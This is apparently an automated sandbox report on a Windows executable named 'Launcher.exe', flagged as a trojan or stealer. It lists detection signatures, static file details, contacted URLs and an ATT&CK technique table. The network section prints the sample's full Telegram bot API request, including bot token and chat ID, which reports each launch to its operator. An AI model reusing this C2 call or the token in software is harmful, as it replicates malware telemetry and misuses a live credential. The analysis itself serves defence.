Edit tour

Windows Analysis Report
Launcher.exe

Overview

General Information

Sample Name:	Launcher.exe
Analysis ID:	753414
MD5:	ac30d9ee77f4a6e23dea621727579dc5
SHA1:	9dc851e691a4af49882138ee7c5bac1dc126becd
SHA256:	d8f1870f30298302fce860d7c56257f6a11e4689642c3d5367d2392db5356bed
Tags:	185-206-213-32CosmicWayexeFakeGaliXCityRedLineStealerUniverseCity
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Uses the Telegram API (likely for C&C communication)

Machine Learning detection for sample

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Binary contains a suspicious time stamp

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Enables debug privileges

Classification

Process Tree

System is w10x64

Launcher.exe (PID: 5948 cmdline: C:\Users\user\Desktop\Launcher.exe MD5: AC30D9EE77F4A6E23DEA621727579DC5)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Machine Learning detection for sample

Source: Launcher.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2

Source: Launcher.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb source: Launcher.exe
Source:	Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb+G source: Launcher.exe

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: Launcher.exe, 00000000.00000002.505090337.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Launcher.exe, 00000000.00000002.508132544.0000000005AE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.506057740.0000000002E88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/UniverseCity;component/Fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/UniverseCity;component/Fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/UniverseCity;component/Images/img_downloadWhite.png
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/Fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/Fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/Images/img_downloadWhite.png
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar/fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar/fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://foo/bar/images/img_downloadwhite.png
Source: Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Launcher.exe, 00000000.00000003.245277692.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.508004314.00000000059FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scripts.sil.org/OFL
Source: Launcher.exe	String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLDosisExtraLightWeightLightMediumSemiBoldBoldExtr
Source: Launcher.exe	String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLMontserratThinMontserratRomanWeightExtraLightLig
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.impallari.com
Source: Launcher.exe	String found in binary or memory: http://www.impallari.comThis
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zkysky.com.ar/
Source: Launcher.exe	String found in binary or memory: http://www.zkysky.com.ar/This
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Launcher.exe	String found in binary or memory: https://api.telegram.org/bot
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage
Source: Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/invite/universecity
Source: Launcher.exe	String found in binary or memory: https://discord.com/invite/universecityGhttps://twitter.com/UniverseCityP2E3https://universe-city.io
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245316162.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245301155.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245327352.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/JulietaUla/Montserrat)
Source: Launcher.exe	String found in binary or memory: https://github.com/JulietaUla/Montserrat)Montserrat
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/UniverseCityP2E
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://universe-city.io/
Source: Launcher.exe	String found in binary or memory: https://universe-city.io/download/UniverseCity.zip

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: global traffic

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2

Source: Launcher.exe, 00000000.00000000.239074629.0000000000706000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUniverseCity.exe4 vs Launcher.exe
Source: Launcher.exe	Binary or memory string: OriginalFilenameUniverseCity.exe4 vs Launcher.exe

Source: Launcher.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Launcher.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Launcher.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Launcher.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\Launcher.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}\InprocServer32

Jump to behavior

Source: classification engine

Classification label: mal48.troj.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\Launcher.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Launcher.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Launcher.exe

Static file information: File size 1126912 > 1048576

Source: Launcher.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Launcher.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Launcher.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb source: Launcher.exe
Source:	Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb+G source: Launcher.exe

Source: Launcher.exe

Static PE information: 0xAAC8B1A6 [Sun Oct 17 22:56:38 2060 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.109491085129885

Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Launcher.exe

Window / User API: threadDelayed 1859

Jump to behavior

Source: Launcher.exe, 00000000.00000002.508111341.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Launcher.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Launcher.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Launcher.exe	Queries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Launcher.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Disable or Modify Tools	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Software Packing	LSASS Memory	1 Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Timestomp	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	1 Ingress Tool Transfer	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Launcher.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.zkysky.com.ar/This	0%	URL Reputation	safe
https://api.telegram	0%	URL Reputation	safe
http://foo/bar/images/img_downloadwhite.png	0%	Avira URL Cloud	safe
http://foo/Images/img_downloadWhite.png	0%	Avira URL Cloud	safe
http://foo/bar/fonts/dosis.ttf	0%	Avira URL Cloud	safe
https://universe-city.io/	0%	Avira URL Cloud	safe
http://defaultcontainer/UniverseCity;component/Images/img_downloadWhite.png	0%	Avira URL Cloud	safe
http://www.impallari.comThis	0%	Avira URL Cloud	safe
http://defaultcontainer/UniverseCity;component/Fonts/montserrat-variablefont_wght.ttf	0%	Avira URL Cloud	safe
http://foo/bar/fonts/montserrat-variablefont_wght.ttf	0%	Avira URL Cloud	safe
http://foo/Fonts/dosis.ttf	0%	Avira URL Cloud	safe
http://www.zkysky.com.ar/	0%	Avira URL Cloud	safe
http://defaultcontainer/UniverseCity;component/Fonts/dosis.ttf	0%	Avira URL Cloud	safe
https://discord.com/invite/universecity	0%	Avira URL Cloud	safe
http://foo/Fonts/montserrat-variablefont_wght.ttf	0%	Avira URL Cloud	safe
http://www.impallari.com	0%	Avira URL Cloud	safe
https://discord.com/invite/universecityGhttps://twitter.com/UniverseCityP2E3https://universe-city.io	0%	Avira URL Cloud	safe
https://universe-city.io/download/UniverseCity.zip	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.impallari.comThis	Launcher.exe	false	Avira URL Cloud: safe	unknown
http://foo/bar/images/img_downloadwhite.png	Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://foo/Images/img_downloadWhite.png	Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram.org	Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage	Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	Launcher.exe	false		high
http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLMontserratThinMontserratRomanWeightExtraLightLig	Launcher.exe	false		high
http://foo/bar/fonts/dosis.ttf	Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://universe-city.io/	Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://defaultcontainer/UniverseCity;component/Images/img_downloadWhite.png	Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://defaultcontainer/UniverseCity;component/Fonts/montserrat-variablefont_wght.ttf	Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://foo/bar/fonts/montserrat-variablefont_wght.ttf	Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://twitter.com/UniverseCityP2E	Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001	Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp	false		high
http://foo/Fonts/dosis.ttf	Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.zkysky.com.ar/This	Launcher.exe	false	URL Reputation: safe	unknown
http://www.zkysky.com.ar/	Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://defaultcontainer/UniverseCity;component/Fonts/dosis.ttf	Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.506057740.0000000002E88000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.telegram	Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/JulietaUla/Montserrat)	Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245316162.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245301155.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245327352.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLDosisExtraLightWeightLightMediumSemiBoldBoldExtr	Launcher.exe	false		high
https://discord.com/invite/universecity	Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://foo/Fonts/montserrat-variablefont_wght.ttf	Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.impallari.com	Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scripts.sil.org/OFL	Launcher.exe, 00000000.00000003.245277692.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.508004314.00000000059FF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	Launcher.exe, 00000000.00000002.505090337.0000000002C24000.00000004.00000800.00020000.00000000.sdmp	false		high
